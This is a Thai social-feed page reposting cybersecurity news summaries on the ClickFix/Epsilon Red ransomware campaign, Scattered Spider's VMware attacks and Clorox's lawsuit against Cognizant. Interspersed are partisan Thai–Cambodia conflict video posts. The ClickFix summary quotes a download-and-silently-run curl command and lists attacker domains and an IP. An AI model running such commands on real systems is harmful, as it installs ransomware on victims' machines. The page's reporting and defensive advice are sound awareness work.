• เรื่องเล่าจากข่าว: “ClickFix” กับกับดักปลอมที่เปิดทางให้ Epsilon Red เข้าระบบคุณ

    ตั้งแต่เดือนกรกฎาคม 2025 แฮกเกอร์เริ่มใช้หน้าเว็บปลอมที่ดูเหมือนระบบยืนยันตัวตนจากแพลตฟอร์มดัง เช่น Discord, Twitch, Kick และ OnlyFans โดยอ้างว่าเป็น “ClickFix verification” เพื่อหลอกให้ผู้ใช้ดาวน์โหลดไฟล์ .HTA ซึ่งเป็นไฟล์ HTML ที่สามารถรันสคริปต์ได้ใน Windows

    เมื่อผู้ใช้คลิก “ยืนยันตัวตน” หน้าเว็บจะเปิดอีกหน้าที่แอบรันคำสั่งผ่าน ActiveXObject เช่น WScript.Shell เพื่อดาวน์โหลดไฟล์ ransomware จากเซิร์ฟเวอร์ของแฮกเกอร์ แล้วรันแบบเงียบ ๆ โดยไม่แสดงหน้าต่างใด ๆ

    เทคนิคนี้ต่างจากเวอร์ชันเก่าที่ใช้การคัดลอกคำสั่งไปยัง clipboard—เพราะเวอร์ชันใหม่นี้รันคำสั่งโดยตรงผ่านเบราว์เซอร์ ทำให้หลบเลี่ยงระบบป้องกันได้ง่ายขึ้น

    Epsilon Red ransomware จะเข้ารหัสไฟล์ทั้งหมดในเครื่อง และทิ้งข้อความเรียกค่าไถ่ที่มีสไตล์คล้าย REvil แต่มีการปรับปรุงด้านไวยากรณ์เล็กน้อย

    Epsilon Red ransomware ถูกแพร่ผ่านไฟล์ .HTA ที่แฝงอยู่ในหน้าเว็บปลอมชื่อ “ClickFix”
    หน้าเว็บปลอมอ้างว่าเป็นระบบยืนยันตัวตนจาก Discord, Twitch, Kick, OnlyFans
    หลอกให้ผู้ใช้คลิกและรันไฟล์ .HTA ที่มีสคริปต์อันตราย

    ไฟล์ .HTA ใช้ ActiveXObject เพื่อรันคำสั่งผ่าน Windows Script Host (WSH)
    เช่น shell.Run("cmd /c curl -s -o a.exe ... && a.exe", 0)
    ดาวน์โหลดไฟล์ ransomware และรันแบบเงียบโดยไม่เปิดหน้าต่าง

    แฮกเกอร์ใช้เทคนิค social engineering เช่นข้อความยืนยันปลอมเพื่อหลอกผู้ใช้
    เช่น “Your Verificatification Code Is: PC-19fj5e9i-cje8i3e4” พร้อม typo จงใจให้ดูไม่อันตราย
    ใช้คำสั่ง pause เพื่อให้หน้าต่างค้างไว้ดูเหมือนระบบจริง

    Epsilon Red ransomware เข้ารหัสไฟล์ทั้งหมดในเครื่องและทิ้งข้อความเรียกค่าไถ่
    มีลักษณะคล้าย REvil แต่ไม่มีความเกี่ยวข้องโดยตรง
    ใช้ PowerShell scripts หลายตัวเพื่อเตรียมระบบก่อนเข้ารหัส

    โครงสร้างแคมเปญมีการปลอมตัวเป็นบริการยอดนิยมและใช้ IP/โดเมนเฉพาะในการโจมตี
    เช่น twtich[.]cc, capchabot[.]cc และ IP 155.94.155.227:2269
    มีการใช้ Quasar RAT ร่วมด้วยในบางกรณี

    ผู้ใช้ที่เปิดไฟล์ .HTA หรือใช้ Internet Explorer มีความเสี่ยงสูงมาก
    ActiveX ยังเปิดใช้งานในบางระบบ Windows โดยไม่รู้ตัว
    การรันคำสั่งผ่านเบราว์เซอร์สามารถหลบเลี่ยง SmartScreen และระบบป้องกันทั่วไป

    องค์กรที่อนุญาตให้ใช้ปลั๊กอินเบราว์เซอร์หรือไม่จำกัดการเข้าถึงเว็บมีความเสี่ยงสูง
    ผู้ใช้สามารถเข้าถึงหน้า ClickFix ปลอมและรันไฟล์ได้โดยไม่รู้ตัว
    Endpoint อาจถูกเข้ารหัสและเรียกค่าไถ่ทันที

    การใช้ social engineering แบบปลอมตัวเป็นบริการยอดนิยมทำให้ผู้ใช้ตกหลุมพรางง่ายขึ้น
    ผู้ใช้เชื่อว่าเป็นการยืนยันตัวตนจริงจาก Discord หรือ Twitch
    ไม่สงสัยว่าเป็นการโจมตีเพราะหน้าตาเว็บดูน่าเชื่อถือ

    ระบบป้องกันแบบเดิมไม่สามารถตรวจจับการรันคำสั่งผ่าน ActiveX ได้ทันเวลา
    การรันแบบเงียบไม่แสดงหน้าต่างหรือแจ้งเตือน
    ไฟล์ถูกดาวน์โหลดและรันในหน่วยความจำโดยไม่มีร่องรอย

    https://hackread.com/onlyfans-discord-clickfix-pages-epsilon-red-ransomware/
    🧠 เรื่องเล่าจากข่าว: “ClickFix” กับกับดักปลอมที่เปิดทางให้ Epsilon Red เข้าระบบคุณ ตั้งแต่เดือนกรกฎาคม 2025 แฮกเกอร์เริ่มใช้หน้าเว็บปลอมที่ดูเหมือนระบบยืนยันตัวตนจากแพลตฟอร์มดัง เช่น Discord, Twitch, Kick และ OnlyFans โดยอ้างว่าเป็น “ClickFix verification” เพื่อหลอกให้ผู้ใช้ดาวน์โหลดไฟล์ .HTA ซึ่งเป็นไฟล์ HTML ที่สามารถรันสคริปต์ได้ใน Windows เมื่อผู้ใช้คลิก “ยืนยันตัวตน” หน้าเว็บจะเปิดอีกหน้าที่แอบรันคำสั่งผ่าน ActiveXObject เช่น WScript.Shell เพื่อดาวน์โหลดไฟล์ ransomware จากเซิร์ฟเวอร์ของแฮกเกอร์ แล้วรันแบบเงียบ ๆ โดยไม่แสดงหน้าต่างใด ๆ เทคนิคนี้ต่างจากเวอร์ชันเก่าที่ใช้การคัดลอกคำสั่งไปยัง clipboard—เพราะเวอร์ชันใหม่นี้รันคำสั่งโดยตรงผ่านเบราว์เซอร์ ทำให้หลบเลี่ยงระบบป้องกันได้ง่ายขึ้น Epsilon Red ransomware จะเข้ารหัสไฟล์ทั้งหมดในเครื่อง และทิ้งข้อความเรียกค่าไถ่ที่มีสไตล์คล้าย REvil แต่มีการปรับปรุงด้านไวยากรณ์เล็กน้อย ✅ Epsilon Red ransomware ถูกแพร่ผ่านไฟล์ .HTA ที่แฝงอยู่ในหน้าเว็บปลอมชื่อ “ClickFix” ➡️ หน้าเว็บปลอมอ้างว่าเป็นระบบยืนยันตัวตนจาก Discord, Twitch, Kick, OnlyFans ➡️ หลอกให้ผู้ใช้คลิกและรันไฟล์ .HTA ที่มีสคริปต์อันตราย ✅ ไฟล์ .HTA ใช้ ActiveXObject เพื่อรันคำสั่งผ่าน Windows Script Host (WSH) ➡️ เช่น shell.Run("cmd /c curl -s -o a.exe ... && a.exe", 0) ➡️ ดาวน์โหลดไฟล์ ransomware และรันแบบเงียบโดยไม่เปิดหน้าต่าง ✅ แฮกเกอร์ใช้เทคนิค social engineering เช่นข้อความยืนยันปลอมเพื่อหลอกผู้ใช้ ➡️ เช่น “Your Verificatification Code Is: PC-19fj5e9i-cje8i3e4” พร้อม typo จงใจให้ดูไม่อันตราย ➡️ ใช้คำสั่ง pause เพื่อให้หน้าต่างค้างไว้ดูเหมือนระบบจริง ✅ Epsilon Red ransomware เข้ารหัสไฟล์ทั้งหมดในเครื่องและทิ้งข้อความเรียกค่าไถ่ ➡️ มีลักษณะคล้าย REvil แต่ไม่มีความเกี่ยวข้องโดยตรง ➡️ ใช้ PowerShell scripts หลายตัวเพื่อเตรียมระบบก่อนเข้ารหัส ✅ โครงสร้างแคมเปญมีการปลอมตัวเป็นบริการยอดนิยมและใช้ IP/โดเมนเฉพาะในการโจมตี ➡️ เช่น twtich[.]cc, capchabot[.]cc และ IP 155.94.155.227:2269 ➡️ มีการใช้ Quasar RAT ร่วมด้วยในบางกรณี ‼️ ผู้ใช้ที่เปิดไฟล์ .HTA หรือใช้ Internet Explorer มีความเสี่ยงสูงมาก ⛔ ActiveX ยังเปิดใช้งานในบางระบบ Windows โดยไม่รู้ตัว ⛔ การรันคำสั่งผ่านเบราว์เซอร์สามารถหลบเลี่ยง SmartScreen และระบบป้องกันทั่วไป ‼️ องค์กรที่อนุญาตให้ใช้ปลั๊กอินเบราว์เซอร์หรือไม่จำกัดการเข้าถึงเว็บมีความเสี่ยงสูง ⛔ ผู้ใช้สามารถเข้าถึงหน้า ClickFix ปลอมและรันไฟล์ได้โดยไม่รู้ตัว ⛔ Endpoint อาจถูกเข้ารหัสและเรียกค่าไถ่ทันที ‼️ การใช้ social engineering แบบปลอมตัวเป็นบริการยอดนิยมทำให้ผู้ใช้ตกหลุมพรางง่ายขึ้น ⛔ ผู้ใช้เชื่อว่าเป็นการยืนยันตัวตนจริงจาก Discord หรือ Twitch ⛔ ไม่สงสัยว่าเป็นการโจมตีเพราะหน้าตาเว็บดูน่าเชื่อถือ ‼️ ระบบป้องกันแบบเดิมไม่สามารถตรวจจับการรันคำสั่งผ่าน ActiveX ได้ทันเวลา ⛔ การรันแบบเงียบไม่แสดงหน้าต่างหรือแจ้งเตือน ⛔ ไฟล์ถูกดาวน์โหลดและรันในหน่วยความจำโดยไม่มีร่องรอย https://hackread.com/onlyfans-discord-clickfix-pages-epsilon-red-ransomware/
    HACKREAD.COM
    OnlyFans, Discord ClickFix-Themed Pages Spread Epsilon Red Ransomware
    Follow us on Bluesky, Twitter (X), Mastodon and Facebook at @Hackread
    0 ความคิดเห็น 0 การแบ่งปัน 90 มุมมอง 0 รีวิว
  • หลวงตาสุจงานงอก พบคลิปโซเชียลไทย แห่ขอบคุณสายลับตาสุจ [31/7/68]
    (Thai social media thanks Thai spy named Ta Such)

    #หลวงตาสุจ #สายลับไทย #ขอบคุณสายลับ #สายลับตาสุจ #ไทยปลื้มตาสุจ #ข่าวดังโซเชียล #TruthFromThailand #CambodiaNoCeasefire #Hunsenfiredfirst #thaitimes #news1 #shorts #សូមកុំប្រាប់រឿងនេះជូនជនជាតិខ្មែរ។
    หลวงตาสุจงานงอก พบคลิปโซเชียลไทย แห่ขอบคุณสายลับตาสุจ [31/7/68] (Thai social media thanks Thai spy named Ta Such) #หลวงตาสุจ #สายลับไทย #ขอบคุณสายลับ #สายลับตาสุจ #ไทยปลื้มตาสุจ #ข่าวดังโซเชียล #TruthFromThailand #CambodiaNoCeasefire #Hunsenfiredfirst #thaitimes #news1 #shorts #សូមកុំប្រាប់រឿងនេះជូនជនជាតិខ្មែរ។
    0 ความคิดเห็น 0 การแบ่งปัน 80 มุมมอง 0 0 รีวิว
  • ด่วน! ทหารไทยชวนชาวโซเชียลไทย รวมพลังทำสิ่งนี้! [30/7/68]

    #ด่วนทหารไทยประกาศ #ชวนชาวโซเชียลรวมพลัง #รวมพลังเพื่อชาติ #SocialPowerFromThailand #เสียงจากแนวหน้า #ทหารไทยกับประชาชน #ThaiArmyCallsToAction #ข่าววันนี้ #ข่าวดัง #ข่าวโซเชียล
    #กัมพูชายิงก่อน #ไทยนี้รักสงบแต่ถึงรบไม่ขลาด #CambodiaOpenedFire #CambodiaNoCeasefire #TruthFromThailand #Hunsenfiredfirst #thaitimes #news1 #shorts
    ด่วน! ทหารไทยชวนชาวโซเชียลไทย รวมพลังทำสิ่งนี้! [30/7/68] #ด่วนทหารไทยประกาศ #ชวนชาวโซเชียลรวมพลัง #รวมพลังเพื่อชาติ #SocialPowerFromThailand #เสียงจากแนวหน้า #ทหารไทยกับประชาชน #ThaiArmyCallsToAction #ข่าววันนี้ #ข่าวดัง #ข่าวโซเชียล #กัมพูชายิงก่อน #ไทยนี้รักสงบแต่ถึงรบไม่ขลาด #CambodiaOpenedFire #CambodiaNoCeasefire #TruthFromThailand #Hunsenfiredfirst #thaitimes #news1 #shorts
    0 ความคิดเห็น 0 การแบ่งปัน 123 มุมมอง 0 0 รีวิว
  • เรื่องเล่าจากเงามืด: เมื่อ Scattered Spider ใช้โทรศัพท์แทนมัลแวร์เพื่อยึดระบบเสมือน

    Scattered Spider เป็นกลุ่มแฮกเกอร์ที่มีชื่อเสียงจากการโจมตีองค์กรใหญ่ เช่น MGM Resorts และ Harrods โดยใช้เทคนิคที่ไม่ต้องพึ่งช่องโหว่ซอฟต์แวร์ แต่ใช้ “social engineering” ผ่านการโทรศัพท์ไปยัง Help Desk เพื่อขอรีเซ็ตรหัสผ่านของบัญชี Active Directory

    เมื่อได้สิทธิ์เข้าระบบแล้ว พวกเขาจะค้นหาข้อมูลภายใน เช่น รายชื่อผู้ดูแลระบบ vSphere และกลุ่มสิทธิ์ระดับสูง แล้วโทรอีกครั้งเพื่อขอรีเซ็ตรหัสของผู้ดูแลระบบ จากนั้นใช้สิทธิ์ที่ได้เข้าไปยึด VMware vCenter Server Appliance (VCSA) และเปิดช่องทาง SSH บน ESXi hypervisor เพื่อควบคุมระบบทั้งหมด

    พวกเขายังใช้เครื่องมือถูกกฎหมายอย่าง Teleport เพื่อสร้างช่องทางสื่อสารแบบเข้ารหัสที่หลบเลี่ยงไฟร์วอลล์ และทำการโจมตีแบบ “disk-swap” โดยปิด VM ของ Domain Controller แล้วถอดดิสก์ไปติดตั้งบน VM ที่ควบคุมเอง เพื่อขโมยฐานข้อมูล NTDS.dit ของ Active Directory

    ก่อนจะปล่อยแรนซัมแวร์ พวกเขายังลบงานสำรองข้อมูลและ snapshot ทั้งหมด เพื่อให้เหยื่อไม่มีทางกู้คืนได้ และสุดท้ายก็เข้ารหัสไฟล์ VM ทั้งหมดจากระดับ hypervisor โดยใช้สิทธิ์ root ผ่าน SSH

    Scattered Spider (UNC3944) ใช้ social engineering เพื่อยึดระบบ VMware vSphere
    เริ่มจากโทรหา Help Desk เพื่อขอรีเซ็ตรหัสผ่านของบัญชี AD
    ใช้ข้อมูลจากการเจาะระบบภายในเพื่อยกระดับสิทธิ์

    กลุ่มนี้ใช้เครื่องมือถูกกฎหมาย เช่น Teleport เพื่อสร้างช่องทางควบคุมแบบเข้ารหัส
    ติดตั้งบน VCSA เพื่อหลบเลี่ยงการตรวจจับจาก firewall และ EDR
    สร้างช่องทางควบคุมระยะไกลแบบถาวร

    เทคนิค “disk-swap” ใช้ในการขโมยฐานข้อมูล Active Directory โดยไม่ถูกตรวจจับ
    ปิด VM ของ Domain Controller แล้วถอดดิสก์ไปติดตั้งบน VM ที่ควบคุม
    ขโมยไฟล์ NTDS.dit โดยไม่ผ่านระบบปฏิบัติการของ VM

    ก่อนปล่อยแรนซัมแวร์ กลุ่มนี้จะลบงานสำรองข้อมูลทั้งหมด
    ลบ backup jobs และ repositories เพื่อป้องกันการกู้คืน
    ใช้ SSH บน ESXi hosts เพื่อเข้ารหัสไฟล์ VM โดยตรง

    Google แนะนำให้เปลี่ยนแนวทางป้องกันจาก EDR เป็น “infrastructure-centric defense”
    เน้นการตรวจสอบระดับ hypervisor และการควบคุมสิทธิ์
    ใช้ MFA ที่ต้าน phishing, แยกโครงสร้างสำรองข้อมูล, และตรวจสอบ log อย่างต่อเนื่อง

    การโจมตีแบบนี้สามารถเกิดขึ้นได้ภายในเวลาไม่กี่ชั่วโมง
    จากการโทรครั้งแรกถึงการเข้ารหัสข้อมูลใช้เวลาเพียงไม่กี่ชั่วโมง
    ทำให้ระบบตรวจจับแบบเดิมไม่ทันต่อเหตุการณ์

    ระบบ VMware ESXi และ VCSA มีช่องว่างด้านการตรวจสอบที่ EDR มองไม่เห็น
    ไม่มี agent รันใน hypervisor ทำให้การโจมตีไม่ถูกตรวจจับ
    ต้องใช้การตรวจสอบ log จากระดับระบบเสมือนโดยตรง

    การใช้ Active Directory ร่วมกับ vSphere เป็นจุดอ่อนสำคัญ
    เมื่อ AD ถูกยึด สิทธิ์ใน vSphere ก็ถูกยึดตามไปด้วย
    ควรแยกโครงสร้างสิทธิ์และใช้ MFA ที่ไม่พึ่ง AD

    Help Desk กลายเป็นจุดเริ่มต้นของการโจมตี
    การรีเซ็ตรหัสผ่านผ่านโทรศัพท์เป็นช่องทางที่ถูกใช้บ่อย
    ควรมีขั้นตอนตรวจสอบตัวตนที่เข้มงวดและห้ามรีเซ็ตบัญชีระดับสูงผ่านโทรศัพท์

    https://hackread.com/scattered-spider-ransomware-hijack-vmware-systems-google/
    🕷️ เรื่องเล่าจากเงามืด: เมื่อ Scattered Spider ใช้โทรศัพท์แทนมัลแวร์เพื่อยึดระบบเสมือน Scattered Spider เป็นกลุ่มแฮกเกอร์ที่มีชื่อเสียงจากการโจมตีองค์กรใหญ่ เช่น MGM Resorts และ Harrods โดยใช้เทคนิคที่ไม่ต้องพึ่งช่องโหว่ซอฟต์แวร์ แต่ใช้ “social engineering” ผ่านการโทรศัพท์ไปยัง Help Desk เพื่อขอรีเซ็ตรหัสผ่านของบัญชี Active Directory เมื่อได้สิทธิ์เข้าระบบแล้ว พวกเขาจะค้นหาข้อมูลภายใน เช่น รายชื่อผู้ดูแลระบบ vSphere และกลุ่มสิทธิ์ระดับสูง แล้วโทรอีกครั้งเพื่อขอรีเซ็ตรหัสของผู้ดูแลระบบ จากนั้นใช้สิทธิ์ที่ได้เข้าไปยึด VMware vCenter Server Appliance (VCSA) และเปิดช่องทาง SSH บน ESXi hypervisor เพื่อควบคุมระบบทั้งหมด พวกเขายังใช้เครื่องมือถูกกฎหมายอย่าง Teleport เพื่อสร้างช่องทางสื่อสารแบบเข้ารหัสที่หลบเลี่ยงไฟร์วอลล์ และทำการโจมตีแบบ “disk-swap” โดยปิด VM ของ Domain Controller แล้วถอดดิสก์ไปติดตั้งบน VM ที่ควบคุมเอง เพื่อขโมยฐานข้อมูล NTDS.dit ของ Active Directory ก่อนจะปล่อยแรนซัมแวร์ พวกเขายังลบงานสำรองข้อมูลและ snapshot ทั้งหมด เพื่อให้เหยื่อไม่มีทางกู้คืนได้ และสุดท้ายก็เข้ารหัสไฟล์ VM ทั้งหมดจากระดับ hypervisor โดยใช้สิทธิ์ root ผ่าน SSH ✅ Scattered Spider (UNC3944) ใช้ social engineering เพื่อยึดระบบ VMware vSphere ➡️ เริ่มจากโทรหา Help Desk เพื่อขอรีเซ็ตรหัสผ่านของบัญชี AD ➡️ ใช้ข้อมูลจากการเจาะระบบภายในเพื่อยกระดับสิทธิ์ ✅ กลุ่มนี้ใช้เครื่องมือถูกกฎหมาย เช่น Teleport เพื่อสร้างช่องทางควบคุมแบบเข้ารหัส ➡️ ติดตั้งบน VCSA เพื่อหลบเลี่ยงการตรวจจับจาก firewall และ EDR ➡️ สร้างช่องทางควบคุมระยะไกลแบบถาวร ✅ เทคนิค “disk-swap” ใช้ในการขโมยฐานข้อมูล Active Directory โดยไม่ถูกตรวจจับ ➡️ ปิด VM ของ Domain Controller แล้วถอดดิสก์ไปติดตั้งบน VM ที่ควบคุม ➡️ ขโมยไฟล์ NTDS.dit โดยไม่ผ่านระบบปฏิบัติการของ VM ✅ ก่อนปล่อยแรนซัมแวร์ กลุ่มนี้จะลบงานสำรองข้อมูลทั้งหมด ➡️ ลบ backup jobs และ repositories เพื่อป้องกันการกู้คืน ➡️ ใช้ SSH บน ESXi hosts เพื่อเข้ารหัสไฟล์ VM โดยตรง ✅ Google แนะนำให้เปลี่ยนแนวทางป้องกันจาก EDR เป็น “infrastructure-centric defense” ➡️ เน้นการตรวจสอบระดับ hypervisor และการควบคุมสิทธิ์ ➡️ ใช้ MFA ที่ต้าน phishing, แยกโครงสร้างสำรองข้อมูล, และตรวจสอบ log อย่างต่อเนื่อง ‼️ การโจมตีแบบนี้สามารถเกิดขึ้นได้ภายในเวลาไม่กี่ชั่วโมง ⛔ จากการโทรครั้งแรกถึงการเข้ารหัสข้อมูลใช้เวลาเพียงไม่กี่ชั่วโมง ⛔ ทำให้ระบบตรวจจับแบบเดิมไม่ทันต่อเหตุการณ์ ‼️ ระบบ VMware ESXi และ VCSA มีช่องว่างด้านการตรวจสอบที่ EDR มองไม่เห็น ⛔ ไม่มี agent รันใน hypervisor ทำให้การโจมตีไม่ถูกตรวจจับ ⛔ ต้องใช้การตรวจสอบ log จากระดับระบบเสมือนโดยตรง ‼️ การใช้ Active Directory ร่วมกับ vSphere เป็นจุดอ่อนสำคัญ ⛔ เมื่อ AD ถูกยึด สิทธิ์ใน vSphere ก็ถูกยึดตามไปด้วย ⛔ ควรแยกโครงสร้างสิทธิ์และใช้ MFA ที่ไม่พึ่ง AD ‼️ Help Desk กลายเป็นจุดเริ่มต้นของการโจมตี ⛔ การรีเซ็ตรหัสผ่านผ่านโทรศัพท์เป็นช่องทางที่ถูกใช้บ่อย ⛔ ควรมีขั้นตอนตรวจสอบตัวตนที่เข้มงวดและห้ามรีเซ็ตบัญชีระดับสูงผ่านโทรศัพท์ https://hackread.com/scattered-spider-ransomware-hijack-vmware-systems-google/
    HACKREAD.COM
    Scattered Spider Launching Ransomware on Hijacked VMware Systems, Google
    Follow us on Bluesky, Twitter (X), Mastodon and Facebook at @Hackread
    0 ความคิดเห็น 0 การแบ่งปัน 119 มุมมอง 0 รีวิว
  • เรื่องเล่าจากสายโทรศัพท์: เมื่อแฮกเกอร์แค่ “ขอรหัส” แล้วได้จริง

    ย้อนกลับไปในเดือนสิงหาคม 2023 บริษัท Clorox ผู้ผลิตน้ำยาฟอกขาวชื่อดัง ถูกโจมตีด้วยแรนซัมแวร์โดยกลุ่ม Scattered Spider ซึ่งใช้วิธีง่ายๆ อย่างการโทรไปยังฝ่าย IT ของ Cognizant—ผู้ให้บริการด้านเทคโนโลยีของ Clorox—แล้ว “ขอรหัสผ่าน” โดยแอบอ้างว่าเป็นพนักงาน

    สิ่งที่น่าตกใจคือ พนักงานของ Cognizant กลับให้รหัสผ่านโดยไม่ตรวจสอบตัวตนใดๆ ทั้งสิ้น! ไม่ถามชื่อผู้จัดการ ไม่ตรวจสอบอีเมล ไม่ใช้ระบบยืนยันตัวตนที่ Clorox เตรียมไว้เลยแม้แต่นิดเดียว

    ผลลัพธ์คือ Clorox ต้องหยุดการผลิต, ปิดระบบ IT, และใช้การจัดการคำสั่งซื้อแบบแมนนวลนานหลายสัปดาห์ รวมความเสียหายกว่า 380 ล้านดอลลาร์ และล่าสุด Clorox ได้ฟ้อง Cognizant ฐานประมาทเลินเล่ออย่างร้ายแรง

    Clorox ถูกโจมตีด้วยแรนซัมแวร์ในเดือนสิงหาคม 2023 โดยกลุ่ม Scattered Spider
    ใช้วิธี social engineering โทรไปขอรหัสผ่านจากฝ่าย IT โดยแอบอ้างเป็นพนักงาน
    ไม่ใช้มัลแวร์หรือเทคนิคซับซ้อนใดๆ

    Cognizant เป็นผู้ให้บริการ IT ที่ดูแลระบบภายในของ Clorox รวมถึงการรีเซ็ตรหัสผ่านและ MFA
    มีหน้าที่ตรวจสอบตัวตนก่อนให้ข้อมูลสำคัญ
    แต่กลับละเลยขั้นตอนทั้งหมดที่ Clorox กำหนดไว้

    Clorox ฟ้อง Cognizant เรียกค่าเสียหาย 380 ล้านดอลลาร์
    รวมถึงค่าใช้จ่ายในการฟื้นฟูระบบกว่า 49 ล้านดอลลาร์
    และความเสียหายจากการหยุดผลิตและจัดส่งสินค้า

    มีหลักฐานเป็นบทสนทนาระหว่างแฮกเกอร์กับพนักงาน Cognizant ที่ให้รหัสโดยไม่ตรวจสอบ
    “I don’t have a password, so I can’t connect.”
    “Oh, ok. Ok. So, let me provide the password to you, okay?”

    ระบบที่ควรใช้คือ MyID และการตรวจสอบผ่านชื่อผู้จัดการและอีเมลยืนยัน
    แต่ไม่ได้ถูกนำมาใช้เลยในเหตุการณ์นี้
    แสดงถึงความล้มเหลวในการฝึกอบรมและควบคุมคุณภาพ

    การละเลยขั้นตอนตรวจสอบตัวตนสามารถเปิดช่องให้เกิดการโจมตีร้ายแรง
    แม้จะมีระบบความปลอดภัยดีแค่ไหน แต่จุดอ่อนคือ “มนุษย์” ที่ไม่ทำตามขั้นตอน
    การแอบอ้างตัวตนเป็นวิธีพื้นฐานที่ยังได้ผลในหลายองค์กร

    การจ้างบริษัทภายนอกดูแลระบบ IT ต้องมีการกำกับและตรวจสอบอย่างเข้มงวด
    ไม่ควรคิดว่า “จ้างแล้วจบ” โดยไม่ติดตามการปฏิบัติงานจริง
    ควรมีสัญญาที่ระบุขั้นตอนความปลอดภัยอย่างชัดเจน

    การตอบสนองต่อเหตุการณ์โจมตีต้องรวดเร็วและแม่นยำ
    Clorox ระบุว่า Cognizantใช้เวลานานเกินไปในการติดตั้งเครื่องมือป้องกัน
    ส่งผลให้การควบคุมความเสียหายล่าช้าไปหลายชั่วโมง

    การละเมิดขั้นตอนพื้นฐานอาจนำไปสู่ความเสียหายระดับองค์กร
    ไม่ใช่แค่ข้อมูลรั่ว แต่กระทบถึงการผลิต, การจัดส่ง, และความเชื่อมั่นของลูกค้า
    อาจต้องใช้เวลาหลายเดือนในการฟื้นฟูภาพลักษณ์และระบบ

    https://www.tomshardware.com/tech-industry/cyber-security/it-provider-sued-after-it-simply-handed-the-credentials-to-hackers-clorox-claims-cognizant-gaffe-enabled-a-usd380m-ransomware-attack
    🔓 เรื่องเล่าจากสายโทรศัพท์: เมื่อแฮกเกอร์แค่ “ขอรหัส” แล้วได้จริง ย้อนกลับไปในเดือนสิงหาคม 2023 บริษัท Clorox ผู้ผลิตน้ำยาฟอกขาวชื่อดัง ถูกโจมตีด้วยแรนซัมแวร์โดยกลุ่ม Scattered Spider ซึ่งใช้วิธีง่ายๆ อย่างการโทรไปยังฝ่าย IT ของ Cognizant—ผู้ให้บริการด้านเทคโนโลยีของ Clorox—แล้ว “ขอรหัสผ่าน” โดยแอบอ้างว่าเป็นพนักงาน สิ่งที่น่าตกใจคือ พนักงานของ Cognizant กลับให้รหัสผ่านโดยไม่ตรวจสอบตัวตนใดๆ ทั้งสิ้น! ไม่ถามชื่อผู้จัดการ ไม่ตรวจสอบอีเมล ไม่ใช้ระบบยืนยันตัวตนที่ Clorox เตรียมไว้เลยแม้แต่นิดเดียว ผลลัพธ์คือ Clorox ต้องหยุดการผลิต, ปิดระบบ IT, และใช้การจัดการคำสั่งซื้อแบบแมนนวลนานหลายสัปดาห์ รวมความเสียหายกว่า 380 ล้านดอลลาร์ และล่าสุด Clorox ได้ฟ้อง Cognizant ฐานประมาทเลินเล่ออย่างร้ายแรง ✅ Clorox ถูกโจมตีด้วยแรนซัมแวร์ในเดือนสิงหาคม 2023 โดยกลุ่ม Scattered Spider ➡️ ใช้วิธี social engineering โทรไปขอรหัสผ่านจากฝ่าย IT โดยแอบอ้างเป็นพนักงาน ➡️ ไม่ใช้มัลแวร์หรือเทคนิคซับซ้อนใดๆ ✅ Cognizant เป็นผู้ให้บริการ IT ที่ดูแลระบบภายในของ Clorox รวมถึงการรีเซ็ตรหัสผ่านและ MFA ➡️ มีหน้าที่ตรวจสอบตัวตนก่อนให้ข้อมูลสำคัญ ➡️ แต่กลับละเลยขั้นตอนทั้งหมดที่ Clorox กำหนดไว้ ✅ Clorox ฟ้อง Cognizant เรียกค่าเสียหาย 380 ล้านดอลลาร์ ➡️ รวมถึงค่าใช้จ่ายในการฟื้นฟูระบบกว่า 49 ล้านดอลลาร์ ➡️ และความเสียหายจากการหยุดผลิตและจัดส่งสินค้า ✅ มีหลักฐานเป็นบทสนทนาระหว่างแฮกเกอร์กับพนักงาน Cognizant ที่ให้รหัสโดยไม่ตรวจสอบ ➡️ “I don’t have a password, so I can’t connect.” ➡️ “Oh, ok. Ok. So, let me provide the password to you, okay?” ✅ ระบบที่ควรใช้คือ MyID และการตรวจสอบผ่านชื่อผู้จัดการและอีเมลยืนยัน ➡️ แต่ไม่ได้ถูกนำมาใช้เลยในเหตุการณ์นี้ ➡️ แสดงถึงความล้มเหลวในการฝึกอบรมและควบคุมคุณภาพ ‼️ การละเลยขั้นตอนตรวจสอบตัวตนสามารถเปิดช่องให้เกิดการโจมตีร้ายแรง ⛔ แม้จะมีระบบความปลอดภัยดีแค่ไหน แต่จุดอ่อนคือ “มนุษย์” ที่ไม่ทำตามขั้นตอน ⛔ การแอบอ้างตัวตนเป็นวิธีพื้นฐานที่ยังได้ผลในหลายองค์กร ‼️ การจ้างบริษัทภายนอกดูแลระบบ IT ต้องมีการกำกับและตรวจสอบอย่างเข้มงวด ⛔ ไม่ควรคิดว่า “จ้างแล้วจบ” โดยไม่ติดตามการปฏิบัติงานจริง ⛔ ควรมีสัญญาที่ระบุขั้นตอนความปลอดภัยอย่างชัดเจน ‼️ การตอบสนองต่อเหตุการณ์โจมตีต้องรวดเร็วและแม่นยำ ⛔ Clorox ระบุว่า Cognizantใช้เวลานานเกินไปในการติดตั้งเครื่องมือป้องกัน ⛔ ส่งผลให้การควบคุมความเสียหายล่าช้าไปหลายชั่วโมง ‼️ การละเมิดขั้นตอนพื้นฐานอาจนำไปสู่ความเสียหายระดับองค์กร ⛔ ไม่ใช่แค่ข้อมูลรั่ว แต่กระทบถึงการผลิต, การจัดส่ง, และความเชื่อมั่นของลูกค้า ⛔ อาจต้องใช้เวลาหลายเดือนในการฟื้นฟูภาพลักษณ์และระบบ https://www.tomshardware.com/tech-industry/cyber-security/it-provider-sued-after-it-simply-handed-the-credentials-to-hackers-clorox-claims-cognizant-gaffe-enabled-a-usd380m-ransomware-attack
    0 ความคิดเห็น 0 การแบ่งปัน 150 มุมมอง 0 รีวิว
  • เรื่องเล่าจากโลกไซเบอร์: เมื่อ “งานไอที” กลายเป็นช่องทางส่งเงินให้โครงการนิวเคลียร์เกาหลีเหนือ

    ลองจินตนาการว่าคุณเป็นบริษัทเทคโนโลยีในสหรัฐฯ ที่จ้างพนักงานไอทีทำงานจากระยะไกล โดยเชื่อว่าเขาเป็นพลเมืองอเมริกัน แต่จริงๆ แล้ว เขาคือเจ้าหน้าที่จากเกาหลีเหนือที่ใช้ตัวตนปลอม และเงินเดือนที่คุณจ่ายไปนั้นถูกส่งตรงไปยังรัฐบาลเปียงยางเพื่อใช้ในโครงการอาวุธนิวเคลียร์!

